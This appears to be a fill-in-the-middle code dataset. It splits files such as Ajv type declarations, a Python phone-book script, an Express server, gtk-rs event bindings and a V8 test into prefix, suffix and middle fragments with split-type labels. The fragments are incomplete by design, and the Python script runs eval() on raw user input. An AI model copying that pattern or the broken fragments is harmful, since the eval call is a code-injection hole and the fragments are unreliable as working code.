coerceTypes?: boolean | "array";
next?: boolean;
unevaluated?: boolean;
dynamicRef?: boolean;
meta?: SchemaObject | boolean;
defaultMeta?: string | AnySchemaObject;
validateSchema?: boolean | "log";
addUsedSchema?: boolean;
inlineRefs?: boolean | number;
passContext?: boolean;
loopRequired?: number;
loopEnum?: number;
ownProperties?: boolean;
multipleOfPrecision?: boolean | number;
messages?: boolean;
code?: CodeOptions;
}
export interface CodeOptions {
es5?: boolean;
lines?: boolean;
optimize?: boolean | number;
formats?: Code;
source?: boolean;
process?: (code: string, schema?: SchemaEnv) => string;
}
interface InstanceCodeOptions extends CodeOptions {
optimize: number;
}
interface DeprecatedOptions {
/** @deprecated */
ignoreKeywordsWithRef?: boolean;
/** @deprecated */
jsPropertySyntax?: boolean;
/** @deprecated */
unicode?: boolean;
}
declare type RequiredInstanceOptions = {
[K in "strict" | "strictTypes" | "strictTuples" | "inlineRefs" | "loopRequired" | "loopEnum" | "meta" | "messages" | "addUsedSchema" | "validateSchema" | "validateFormats"]: NonNullable<Options[K]>;
} & {
code: InstanceCodeOptions;
};
export declare type InstanceOptions = Options & RequiredInstanceOptions;
export interface Logger {
log(...args: unknown[]): unknown;
warn(...args: unknown[]): unknown;
error(...args: unknown[]): unknown;
}
export default class Ajv {
opts: InstanceOptions;
errors?: ErrorObject[] | null;
logger: Logger;
readonly scope: ValueScope;
readonly schemas: {
[key: string]: SchemaEnv | undefined;
};
readonly refs: {
[ref: string]: SchemaEnv | string | undefined;
};
readonly formats: {
[name: string]: AddedFormat | undefined;
};
readonly RULES: ValidationRules;
readonly _compilations: Set<SchemaEnv>;
private readonly _loading;
private readonly _cache;
private readonly _metaOpts;
static ValidationError: typeof ValidationError;
static MissingRefError: typeof MissingRefError;
constructor(opts?: Options);
_addVocabularies(): void;
_addDefaultMetaSchema(): void;
defaultMeta(): string | AnySchemaObject | undefined;
validate(schema: Schema | string, data: unknown): boolean;
validate(schemaKeyRef: AnySchema | string, data: unknown): boolean | Promise<unknown>;
validate<T>(schema: Schema | JSONSchemaType<T> | string, data: unknown): data is T;
validate<T>(schema: AsyncSchema, data: unknown | T): Promise<T>;
validate<T>(schemaKeyRef: AnySchema | string, data: unknown): data is T | Promise<T>;
compile<T = unknown>(schema: Schema | JSONSchemaType<T>, _meta?: boolean): ValidateFunction<T>;
compile<T = unknown>(schema: AsyncSchema, _meta?: boolean): AsyncValidateFunction<T>;
compile<T = unknown>(schema: AnySchema, _meta?: boolean): AnyValidateFunction<T>;
compileAsync<T = unknown>(schema: SchemaObject | JSONSchemaType<T>, _meta?: boolean): Promise<ValidateFunction<T>>;
compileAsync<T = unknown>(schema: AsyncSchema, meta?: boolean): Promise<AsyncValidateFunction<T>>;
compileAsync<T = unknown>(schema: AnySchemaObject, meta?: boolean): Promise<AnyValidateFunction<T>>;
addSchema(schema: AnySchema | AnySchema[], // If array is passed, `key` will be ignored
key?: string, // Optional schema key. Can be passed to `validate` method instead of schema object or id/ref. One schema per instance can have empty `id` and `key`.
_meta?: boolean, // true if schema is a meta-schema. Used internally, addMetaSchema should be used instead.
_validateSchema?: boolean | "log"): Ajv;
addMetaSchema(schema: AnySchemaObject, key?: string, // schema key
_validateSchema?: boolean | "log"): Ajv;
validateSchema(schema: AnySchema, throwOrLogError?: boolean): boolean | Promise<unknown>;
getSchema<T = unknown>(keyRef: string): AnyValidateFunction<T> | undefined;
removeSchema(schemaKeyRef?: AnySchema | string | RegExp): Ajv;
addVocabulary(definitions: Vocabulary): Ajv;
addKeyword(kwdOrDef: string | KeywordDefinition, def?: KeywordDefinition): Ajv;
getKeyword(keyword: string): AddedKeywordDefinition | boolean;
removeKeyword(keyword: string): Ajv;
addFormat(name: string, format: Format): Ajv;
errorsText(errors?: ErrorObject[] | null | undefined, // optional array of validation errors
{ separator, dataVar }?: ErrorsTextOptions): string;
$dataMetaSchema(metaSchema: AnySchemaObject, keywordsJsonPointers: string[]): AnySchemaObject;
private _removeAllSchemas;
private _addSchema;
private _checkUnique;
private _compileSchemaEnv;
private _compileMetaSchema;
}
export interface ErrorsTextOptions {
separator?: string;
dataVar?: string;
} | export { JSONType } from "./compile/rules";
export { JSONSchemaType } from "./types/json-schema";
export { _, str, stringify, nil, Name, Code, CodeGen, CodeGenOptions } from "./compile/codegen"; | random_line_split |
1_name_phone_number.py |
student_phoneNumber_name = {1: 'a', 3: 'c', 2: 'b'}
def Handler() :
while (1) :
choice = eval(input("Enter :\t 1 - to search student name \n \t 2 - to insert new student record \n \t 0 - to quit\n"))
print(choice)
if (choice == 1) :
if (student_phoneNumber_name) :
phone_number = input("Enter student's phone number : ")
name = SearchRecord(phone_number)
if (name) :
print("name : " + name )
else :
print(str(phone_number) + "Does not exist in record" + str(name))
else :
print("Record is empty ")
elif (choice == 2) :
phone_number = input("Enter student's phone number : ")
name = input("Enter student's name : ") #best example to understand input() and raw_input()
InsertRecord(phone_number, name)
elif (choice == 0) :
break
else:
print("Enter correct choice")
def | (x, y):
student_phoneNumber_name[x] = y
return;
def SearchRecord(x):
print(x)
if (x in student_phoneNumber_name) :
return student_phoneNumber_name[x]
return False
Handler()
print(student_phoneNumber_name) | InsertRecord | identifier_name |
1_name_phone_number.py | student_phoneNumber_name = {1: 'a', 3: 'c', 2: 'b'}
def Handler() :
while (1) :
choice = eval(input("Enter :\t 1 - to search student name \n \t 2 - to insert new student record \n \t 0 - to quit\n"))
print(choice)
if (choice == 1) :
if (student_phoneNumber_name) :
phone_number = input("Enter student's phone number : ")
name = SearchRecord(phone_number)
if (name) :
print("name : " + name )
else :
print(str(phone_number) + "Does not exist in record" + str(name))
else : | InsertRecord(phone_number, name)
elif (choice == 0) :
break
else:
print("Enter correct choice")
def InsertRecord(x, y):
student_phoneNumber_name[x] = y
return;
def SearchRecord(x):
print(x)
if (x in student_phoneNumber_name) :
return student_phoneNumber_name[x]
return False
Handler()
print(student_phoneNumber_name) | print("Record is empty ")
elif (choice == 2) :
phone_number = input("Enter student's phone number : ")
name = input("Enter student's name : ") #best example to understand input() and raw_input() | random_line_split |
1_name_phone_number.py |
student_phoneNumber_name = {1: 'a', 3: 'c', 2: 'b'}
def Handler() :
while (1) :
choice = eval(input("Enter :\t 1 - to search student name \n \t 2 - to insert new student record \n \t 0 - to quit\n"))
print(choice)
if (choice == 1) :
if (student_phoneNumber_name) :
phone_number = input("Enter student's phone number : ")
name = SearchRecord(phone_number)
if (name) :
print("name : " + name )
else :
print(str(phone_number) + "Does not exist in record" + str(name))
else :
print("Record is empty ")
elif (choice == 2) :
phone_number = input("Enter student's phone number : ")
name = input("Enter student's name : ") #best example to understand input() and raw_input()
InsertRecord(phone_number, name)
elif (choice == 0) :
break
else:
print("Enter correct choice")
def InsertRecord(x, y):
student_phoneNumber_name[x] = y
return;
def SearchRecord(x):
|
Handler()
print(student_phoneNumber_name) | print(x)
if (x in student_phoneNumber_name) :
return student_phoneNumber_name[x]
return False | identifier_body |
1_name_phone_number.py |
student_phoneNumber_name = {1: 'a', 3: 'c', 2: 'b'}
def Handler() :
while (1) :
choice = eval(input("Enter :\t 1 - to search student name \n \t 2 - to insert new student record \n \t 0 - to quit\n"))
print(choice)
if (choice == 1) :
|
elif (choice == 2) :
phone_number = input("Enter student's phone number : ")
name = input("Enter student's name : ") #best example to understand input() and raw_input()
InsertRecord(phone_number, name)
elif (choice == 0) :
break
else:
print("Enter correct choice")
def InsertRecord(x, y):
student_phoneNumber_name[x] = y
return;
def SearchRecord(x):
print(x)
if (x in student_phoneNumber_name) :
return student_phoneNumber_name[x]
return False
Handler()
print(student_phoneNumber_name) | if (student_phoneNumber_name) :
phone_number = input("Enter student's phone number : ")
name = SearchRecord(phone_number)
if (name) :
print("name : " + name )
else :
print(str(phone_number) + "Does not exist in record" + str(name))
else :
print("Record is empty ") | conditional_block |
gc.py | # Copyright 2011 Nicholas Bray
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from util.typedispatch import *
from . import graph as cfg
from . dfs import CFGDFS
# Kills unreachable CFG nodes
class Logger(TypeDispatcher):
def __init__(self):
self.merges = []
@defaultdispatch
def default(self, node):
pass
@dispatch(cfg.MultiEntryBlock)
def visitMerge(self, node):
self.merges.append(node)
def evaluate(compiler, g):
logger = Logger()
dfs = CFGDFS(post=logger)
dfs.process(g.entryTerminal)
def live(node):
return node in dfs.processed
for merge in logger.merges:
| for prev in merge._prev:
assert isinstance(prev, tuple), merge._prev
# HACK exposes the internals of merge
filtered = [prev for prev in merge._prev if live(prev[0])]
merge._prev = filtered | conditional_block |
|
gc.py | # Copyright 2011 Nicholas Bray
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from util.typedispatch import *
from . import graph as cfg
from . dfs import CFGDFS
# Kills unreachable CFG nodes
class Logger(TypeDispatcher):
def | (self):
self.merges = []
@defaultdispatch
def default(self, node):
pass
@dispatch(cfg.MultiEntryBlock)
def visitMerge(self, node):
self.merges.append(node)
def evaluate(compiler, g):
logger = Logger()
dfs = CFGDFS(post=logger)
dfs.process(g.entryTerminal)
def live(node):
return node in dfs.processed
for merge in logger.merges:
for prev in merge._prev:
assert isinstance(prev, tuple), merge._prev
# HACK exposes the internals of merge
filtered = [prev for prev in merge._prev if live(prev[0])]
merge._prev = filtered
| __init__ | identifier_name |
gc.py | # Copyright 2011 Nicholas Bray
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from util.typedispatch import *
from . import graph as cfg
from . dfs import CFGDFS
# Kills unreachable CFG nodes
class Logger(TypeDispatcher):
|
def evaluate(compiler, g):
logger = Logger()
dfs = CFGDFS(post=logger)
dfs.process(g.entryTerminal)
def live(node):
return node in dfs.processed
for merge in logger.merges:
for prev in merge._prev:
assert isinstance(prev, tuple), merge._prev
# HACK exposes the internals of merge
filtered = [prev for prev in merge._prev if live(prev[0])]
merge._prev = filtered
| def __init__(self):
self.merges = []
@defaultdispatch
def default(self, node):
pass
@dispatch(cfg.MultiEntryBlock)
def visitMerge(self, node):
self.merges.append(node) | identifier_body |
gc.py | # Copyright 2011 Nicholas Bray
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from util.typedispatch import *
from . import graph as cfg
from . dfs import CFGDFS
# Kills unreachable CFG nodes
class Logger(TypeDispatcher):
def __init__(self):
self.merges = [] | pass
@dispatch(cfg.MultiEntryBlock)
def visitMerge(self, node):
self.merges.append(node)
def evaluate(compiler, g):
logger = Logger()
dfs = CFGDFS(post=logger)
dfs.process(g.entryTerminal)
def live(node):
return node in dfs.processed
for merge in logger.merges:
for prev in merge._prev:
assert isinstance(prev, tuple), merge._prev
# HACK exposes the internals of merge
filtered = [prev for prev in merge._prev if live(prev[0])]
merge._prev = filtered |
@defaultdispatch
def default(self, node): | random_line_split |
server.js | #!/usr/bin/env node
"use strict";
// för pid-filen
const fs = require('fs');
const path = require('path');
var pid = `${process.pid}`;
// skriv pid-filen
var filepathPID = path.join(__dirname, "pid");
fs.writeFile(filepathPID, pid, (err) => {
if (err) { | console.log("PID saved at: " + __dirname);
});
// skapa express-severn
const bodyparser = require('body-parser');
var express = require('express');
var app = express();
var port = 1337;
var staticfiles = path.join(__dirname, 'public');
app.set("views", path.join(__dirname, "views"));
app.set("view engine", "pug");
app.locals.pretty = true;
app.use(bodyparser.urlencoded({ extended: true }));
app.use(express.static(staticfiles));
if ('LINUX_PORT' in process.env) {
port = `${process.env.LINUX_PORT}`;
console.log("LINUX_PORT is set to " + port + ".");
} else {
console.log("LINUX_PORT is set to " + port + ".");
console.log("Server running at http://127.0.0.1:" + port + " with PID: " + process.pid);
}
// ladda routes
const index = require('./routes/index.js');
app.use("/", index);
app.use("/index", index);
const login = require('./routes/login.js');
app.use("/login", login);
const startpage = require('./routes/startpage.js');
app.use("/startpage", startpage);
const movemoney = require('./routes/movemoney.js');
app.use("/movemoney", movemoney);
const swish = require('./routes/swish.js');
app.use("/swish", swish);
const createacc = require('./routes/createacc.js');
app.use("/createacc", createacc);
/*
const move = require('./routes/move.js');
app.use("/move", move);
const movereq = require('./routes/movereq.js');
app.use("/movereq", movereq);
*/
app.listen(port);
module.exports = app;
|
throw err;
}
| conditional_block |
server.js | #!/usr/bin/env node
"use strict";
// för pid-filen
const fs = require('fs');
const path = require('path');
var pid = `${process.pid}`;
// skriv pid-filen
var filepathPID = path.join(__dirname, "pid");
fs.writeFile(filepathPID, pid, (err) => {
if (err) {
throw err;
}
console.log("PID saved at: " + __dirname);
});
// skapa express-severn
const bodyparser = require('body-parser');
var express = require('express');
var app = express();
var port = 1337;
var staticfiles = path.join(__dirname, 'public');
app.set("views", path.join(__dirname, "views"));
app.set("view engine", "pug");
app.locals.pretty = true;
app.use(bodyparser.urlencoded({ extended: true }));
app.use(express.static(staticfiles));
if ('LINUX_PORT' in process.env) {
port = `${process.env.LINUX_PORT}`;
console.log("LINUX_PORT is set to " + port + ".");
} else {
console.log("LINUX_PORT is set to " + port + ".");
console.log("Server running at http://127.0.0.1:" + port + " with PID: " + process.pid);
}
// ladda routes
const index = require('./routes/index.js');
app.use("/", index);
app.use("/index", index);
const login = require('./routes/login.js');
app.use("/login", login);
const startpage = require('./routes/startpage.js');
app.use("/startpage", startpage);
const movemoney = require('./routes/movemoney.js');
app.use("/movemoney", movemoney);
const swish = require('./routes/swish.js');
app.use("/swish", swish);
const createacc = require('./routes/createacc.js'); | const move = require('./routes/move.js');
app.use("/move", move);
const movereq = require('./routes/movereq.js');
app.use("/movereq", movereq);
*/
app.listen(port);
module.exports = app; | app.use("/createacc", createacc);
/* | random_line_split |
event.rs | // Copyright 2015-2016, The Gtk-rs Project Developers.
// See the COPYRIGHT file at the top-level directory of this distribution.
// Licensed under the MIT license, see the LICENSE file or <http://opensource.org/licenses/MIT>
use glib::translate::*;
use gdk_ffi as ffi;
use EventType;
use Window;
glib_wrapper! {
/// A generic GDK event.
pub struct Event(Boxed<ffi::GdkEvent>);
match fn {
copy => |ptr| ffi::gdk_event_copy(ptr),
free => |ptr| ffi::gdk_event_free(ptr),
}
}
impl Event {
/// Returns the event type.
pub fn get_event_type(&self) -> EventType {
self.as_ref().type_
}
/// Returns the associated `Window` if applicable.
pub fn get_window(&self) -> Option<Window> {
unsafe { from_glib_none(self.as_ref().window) }
}
/// Returns whether the event was sent explicitly.
pub fn get_send_event(&self) -> bool {
from_glib(self.as_ref().send_event as i32)
}
/// Returns `true` if the event type matches `T`.
pub fn is<T: FromEvent>(&self) -> bool {
T::is(self)
}
/// Tries to downcast to a specific event type.
pub fn downcast<T: FromEvent>(self) -> Result<T, Self> {
T::from(self)
}
}
/// A helper trait implemented by all event subtypes.
pub trait FromEvent: Sized {
fn is(ev: &Event) -> bool;
fn from(ev: Event) -> Result<Self, Event>;
}
macro_rules! event_wrapper {
($name:ident, $ffi_name:ident) => {
impl<'a> ToGlibPtr<'a, *const ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a Self;
#[inline]
fn to_glib_none(&'a self) -> Stash<'a, *const ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtr::<*const ::gdk_ffi::GdkEvent>::to_glib_none(&self.0).0;
Stash(ptr as *const ::gdk_ffi::$ffi_name, self)
}
}
impl<'a> ToGlibPtrMut<'a, *mut ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a mut Self;
#[inline]
fn to_glib_none_mut(&'a mut self) -> StashMut<'a, *mut ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtrMut::<*mut ::gdk_ffi::GdkEvent>::to_glib_none_mut(&mut self.0).0;
StashMut(ptr as *mut ::gdk_ffi::$ffi_name, self)
}
}
impl FromGlibPtr<*mut ::gdk_ffi::$ffi_name> for $name {
#[inline]
unsafe fn from_glib_none(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_none(ptr as *mut ::gdk_ffi::GdkEvent))
}
#[inline]
unsafe fn from_glib_full(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_full(ptr as *mut ::gdk_ffi::GdkEvent))
}
}
impl AsRef<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_ref(&self) -> &::gdk_ffi::$ffi_name {
unsafe {
let ptr: *const ::gdk_ffi::$ffi_name = self.to_glib_none().0;
&*ptr
}
}
}
impl AsMut<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_mut(&mut self) -> &mut ::gdk_ffi::$ffi_name {
unsafe {
let ptr: *mut ::gdk_ffi::$ffi_name = self.to_glib_none_mut().0;
&mut *ptr
}
}
}
}
}
event_wrapper!(Event, GdkEventAny);
macro_rules! event_subtype {
($name:ident, $($ty:ident)|+) => {
impl ::event::FromEvent for $name {
#[inline]
fn is(ev: &::event::Event) -> bool {
skip_assert_initialized!();
use EventType::*;
match ev.as_ref().type_ {
$($ty)|+ => true,
_ => false,
}
}
#[inline]
fn from(ev: ::event::Event) -> Result<Self, ::event::Event> {
skip_assert_initialized!();
if Self::is(&ev) {
Ok($name(ev))
}
else {
Err(ev)
} | impl ::std::ops::Deref for $name {
type Target = ::event::Event;
fn deref(&self) -> &::event::Event {
&self.0
}
}
impl ::std::ops::DerefMut for $name {
fn deref_mut(&mut self) -> &mut ::event::Event {
&mut self.0
}
}
}
} | }
}
| random_line_split |
event.rs | // Copyright 2015-2016, The Gtk-rs Project Developers.
// See the COPYRIGHT file at the top-level directory of this distribution.
// Licensed under the MIT license, see the LICENSE file or <http://opensource.org/licenses/MIT>
use glib::translate::*;
use gdk_ffi as ffi;
use EventType;
use Window;
glib_wrapper! {
/// A generic GDK event.
pub struct Event(Boxed<ffi::GdkEvent>);
match fn {
copy => |ptr| ffi::gdk_event_copy(ptr),
free => |ptr| ffi::gdk_event_free(ptr),
}
}
impl Event {
/// Returns the event type.
pub fn | (&self) -> EventType {
self.as_ref().type_
}
/// Returns the associated `Window` if applicable.
pub fn get_window(&self) -> Option<Window> {
unsafe { from_glib_none(self.as_ref().window) }
}
/// Returns whether the event was sent explicitly.
pub fn get_send_event(&self) -> bool {
from_glib(self.as_ref().send_event as i32)
}
/// Returns `true` if the event type matches `T`.
pub fn is<T: FromEvent>(&self) -> bool {
T::is(self)
}
/// Tries to downcast to a specific event type.
pub fn downcast<T: FromEvent>(self) -> Result<T, Self> {
T::from(self)
}
}
/// A helper trait implemented by all event subtypes.
pub trait FromEvent: Sized {
fn is(ev: &Event) -> bool;
fn from(ev: Event) -> Result<Self, Event>;
}
macro_rules! event_wrapper {
($name:ident, $ffi_name:ident) => {
impl<'a> ToGlibPtr<'a, *const ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a Self;
#[inline]
fn to_glib_none(&'a self) -> Stash<'a, *const ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtr::<*const ::gdk_ffi::GdkEvent>::to_glib_none(&self.0).0;
Stash(ptr as *const ::gdk_ffi::$ffi_name, self)
}
}
impl<'a> ToGlibPtrMut<'a, *mut ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a mut Self;
#[inline]
fn to_glib_none_mut(&'a mut self) -> StashMut<'a, *mut ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtrMut::<*mut ::gdk_ffi::GdkEvent>::to_glib_none_mut(&mut self.0).0;
StashMut(ptr as *mut ::gdk_ffi::$ffi_name, self)
}
}
impl FromGlibPtr<*mut ::gdk_ffi::$ffi_name> for $name {
#[inline]
unsafe fn from_glib_none(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_none(ptr as *mut ::gdk_ffi::GdkEvent))
}
#[inline]
unsafe fn from_glib_full(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_full(ptr as *mut ::gdk_ffi::GdkEvent))
}
}
impl AsRef<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_ref(&self) -> &::gdk_ffi::$ffi_name {
unsafe {
let ptr: *const ::gdk_ffi::$ffi_name = self.to_glib_none().0;
&*ptr
}
}
}
impl AsMut<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_mut(&mut self) -> &mut ::gdk_ffi::$ffi_name {
unsafe {
let ptr: *mut ::gdk_ffi::$ffi_name = self.to_glib_none_mut().0;
&mut *ptr
}
}
}
}
}
event_wrapper!(Event, GdkEventAny);
macro_rules! event_subtype {
($name:ident, $($ty:ident)|+) => {
impl ::event::FromEvent for $name {
#[inline]
fn is(ev: &::event::Event) -> bool {
skip_assert_initialized!();
use EventType::*;
match ev.as_ref().type_ {
$($ty)|+ => true,
_ => false,
}
}
#[inline]
fn from(ev: ::event::Event) -> Result<Self, ::event::Event> {
skip_assert_initialized!();
if Self::is(&ev) {
Ok($name(ev))
}
else {
Err(ev)
}
}
}
impl ::std::ops::Deref for $name {
type Target = ::event::Event;
fn deref(&self) -> &::event::Event {
&self.0
}
}
impl ::std::ops::DerefMut for $name {
fn deref_mut(&mut self) -> &mut ::event::Event {
&mut self.0
}
}
}
}
| get_event_type | identifier_name |
event.rs | // Copyright 2015-2016, The Gtk-rs Project Developers.
// See the COPYRIGHT file at the top-level directory of this distribution.
// Licensed under the MIT license, see the LICENSE file or <http://opensource.org/licenses/MIT>
use glib::translate::*;
use gdk_ffi as ffi;
use EventType;
use Window;
glib_wrapper! {
/// A generic GDK event.
pub struct Event(Boxed<ffi::GdkEvent>);
match fn {
copy => |ptr| ffi::gdk_event_copy(ptr),
free => |ptr| ffi::gdk_event_free(ptr),
}
}
impl Event {
/// Returns the event type.
pub fn get_event_type(&self) -> EventType |
/// Returns the associated `Window` if applicable.
pub fn get_window(&self) -> Option<Window> {
unsafe { from_glib_none(self.as_ref().window) }
}
/// Returns whether the event was sent explicitly.
pub fn get_send_event(&self) -> bool {
from_glib(self.as_ref().send_event as i32)
}
/// Returns `true` if the event type matches `T`.
pub fn is<T: FromEvent>(&self) -> bool {
T::is(self)
}
/// Tries to downcast to a specific event type.
pub fn downcast<T: FromEvent>(self) -> Result<T, Self> {
T::from(self)
}
}
/// A helper trait implemented by all event subtypes.
pub trait FromEvent: Sized {
fn is(ev: &Event) -> bool;
fn from(ev: Event) -> Result<Self, Event>;
}
macro_rules! event_wrapper {
($name:ident, $ffi_name:ident) => {
impl<'a> ToGlibPtr<'a, *const ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a Self;
#[inline]
fn to_glib_none(&'a self) -> Stash<'a, *const ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtr::<*const ::gdk_ffi::GdkEvent>::to_glib_none(&self.0).0;
Stash(ptr as *const ::gdk_ffi::$ffi_name, self)
}
}
impl<'a> ToGlibPtrMut<'a, *mut ::gdk_ffi::$ffi_name> for $name {
type Storage = &'a mut Self;
#[inline]
fn to_glib_none_mut(&'a mut self) -> StashMut<'a, *mut ::gdk_ffi::$ffi_name, Self> {
let ptr = ToGlibPtrMut::<*mut ::gdk_ffi::GdkEvent>::to_glib_none_mut(&mut self.0).0;
StashMut(ptr as *mut ::gdk_ffi::$ffi_name, self)
}
}
impl FromGlibPtr<*mut ::gdk_ffi::$ffi_name> for $name {
#[inline]
unsafe fn from_glib_none(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_none(ptr as *mut ::gdk_ffi::GdkEvent))
}
#[inline]
unsafe fn from_glib_full(ptr: *mut ::gdk_ffi::$ffi_name) -> Self {
$name(from_glib_full(ptr as *mut ::gdk_ffi::GdkEvent))
}
}
impl AsRef<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_ref(&self) -> &::gdk_ffi::$ffi_name {
unsafe {
let ptr: *const ::gdk_ffi::$ffi_name = self.to_glib_none().0;
&*ptr
}
}
}
impl AsMut<::gdk_ffi::$ffi_name> for $name {
#[inline]
fn as_mut(&mut self) -> &mut ::gdk_ffi::$ffi_name {
unsafe {
let ptr: *mut ::gdk_ffi::$ffi_name = self.to_glib_none_mut().0;
&mut *ptr
}
}
}
}
}
event_wrapper!(Event, GdkEventAny);
macro_rules! event_subtype {
($name:ident, $($ty:ident)|+) => {
impl ::event::FromEvent for $name {
#[inline]
fn is(ev: &::event::Event) -> bool {
skip_assert_initialized!();
use EventType::*;
match ev.as_ref().type_ {
$($ty)|+ => true,
_ => false,
}
}
#[inline]
fn from(ev: ::event::Event) -> Result<Self, ::event::Event> {
skip_assert_initialized!();
if Self::is(&ev) {
Ok($name(ev))
}
else {
Err(ev)
}
}
}
impl ::std::ops::Deref for $name {
type Target = ::event::Event;
fn deref(&self) -> &::event::Event {
&self.0
}
}
impl ::std::ops::DerefMut for $name {
fn deref_mut(&mut self) -> &mut ::event::Event {
&mut self.0
}
}
}
}
| {
self.as_ref().type_
} | identifier_body |
boolean.js | // Copyright 2011 the V8 project authors. All rights reserved.
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
assertEquals(Boolean(void 0), false);
assertEquals(Boolean(null), false);
assertEquals(Boolean(false), false);
assertEquals(Boolean(true), true);
assertEquals(Boolean(0), false);
assertEquals(Boolean(1), true);
assertEquals(Boolean(assertEquals), true);
assertEquals(Boolean(new Object()), true);
assertTrue(new Boolean(false) !== false);
assertTrue(new Boolean(false) == false);
assertTrue(new Boolean(true) !== true);
assertTrue(new Boolean(true) == true);
assertEquals(true, !false);
assertEquals(false, !true);
assertEquals(true, !!true);
assertEquals(false, !!false);
assertEquals(true, true ? true : false);
assertEquals(false, false ? true : false);
assertEquals(false, true ? false : true);
assertEquals(true, false ? false : true);
assertEquals(true, true && true);
assertEquals(false, true && false);
assertEquals(false, false && true);
assertEquals(false, false && false);
// Regression.
var t = 42;
assertEquals(void 0, t.p);
assertEquals(void 0, t.p && true);
assertEquals(void 0, t.p && false);
assertEquals(void 0, t.p && (t.p == 0));
assertEquals(void 0, t.p && (t.p == null));
assertEquals(void 0, t.p && (t.p == t.p));
var o = new Object();
o.p = 'foo';
assertEquals('foo', o.p);
assertEquals('foo', o.p || true);
assertEquals('foo', o.p || false);
assertEquals('foo', o.p || (o.p == 0));
assertEquals('foo', o.p || (o.p == null));
assertEquals('foo', o.p || (o.p == o.p));
// JSToBoolean(x:string)
function f(x) |
assertEquals(false, f(""));
assertEquals(true, f("narf"));
assertEquals(true, f(12345678));
assertEquals(true, f(undefined));
| { return !!("" + x); } | identifier_body |
boolean.js | // Copyright 2011 the V8 project authors. All rights reserved.
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
